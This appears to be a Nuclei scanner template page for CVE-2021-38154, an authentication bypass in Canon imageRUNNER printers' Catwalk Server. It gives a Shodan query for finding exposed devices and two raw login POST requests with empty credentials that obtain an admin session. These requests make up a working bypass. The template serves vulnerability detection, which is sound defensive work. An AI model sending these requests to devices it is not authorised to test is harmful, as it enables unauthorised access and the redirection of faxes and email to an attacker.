Canon Devices - Authentication Bypass in Catwalk Server

CVE-2021-38154

Early Release

Description

Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.

Severity

High

CVSS Score

7.5

Exploit Probability

Published Date

October 10, 2025

Template Author

daffainfo

CVE-2021-38154.yaml

id: CVE-2021-38154

info:
  name: Canon Devices - Authentication Bypass in Catwalk Server
  author: daffainfo
  severity: high
  description: |
    Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.
  reference:
    - https://protocolpolice.nl/CVE-2021-38154_Protocol_Police_Catwalk_Alert
    - https://www.usa.canon.com/internet/portal/us/home/support/product-advisories
    - https://nvd.nist.gov/vuln/detail/CVE-2021-38154
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-38154
    cwe-id: CWE-732
    epss-score: 0.00695
    epss-percentile: 0.71007
    cpe: cpe:2.3:h:canon:-:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: canon
    shodan-query: title:"imageRUNNER"
  tags: cve,cve2021,canon,auth-bypass,vkev

flow: http(1) || http(2)

http:
  - raw:
      - |
        POST /tryLogin.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        loginM=&0000=0011&0002=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 303'
          - 'contains(location, "/portal_top.html")'
          - 'contains(set_cookie, "fusion-http-session-id=")'
        condition: and

  - raw:
      - |
        POST /checkLogin.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        i0017=2&i0019=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(location, "/portal_top.html")'
          - 'contains(set_cookie, "sessid=")'
        condition: and
# digest: 490a0046304402200a2b2a54a813e681d2e21b3f9a13a88f1aa4e56718cb96780369507b999d35b202201e1053737722d5db08b3316ce076eca2b5d1a2feb90cc0e0ed5f8fa218f46246:922c64590222798bb761d5b6d8e72950

7.5Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID:

cve-2021-38154

CWE ID:

cwe-732

References

https://protocolpolice.nl/CVE-2021-38154_Protocol_Police_Catwalk_Alert https://www.usa.canon.com/internet/portal/us/home/support/product-advisories https://nvd.nist.gov/vuln/detail/CVE-2021-38154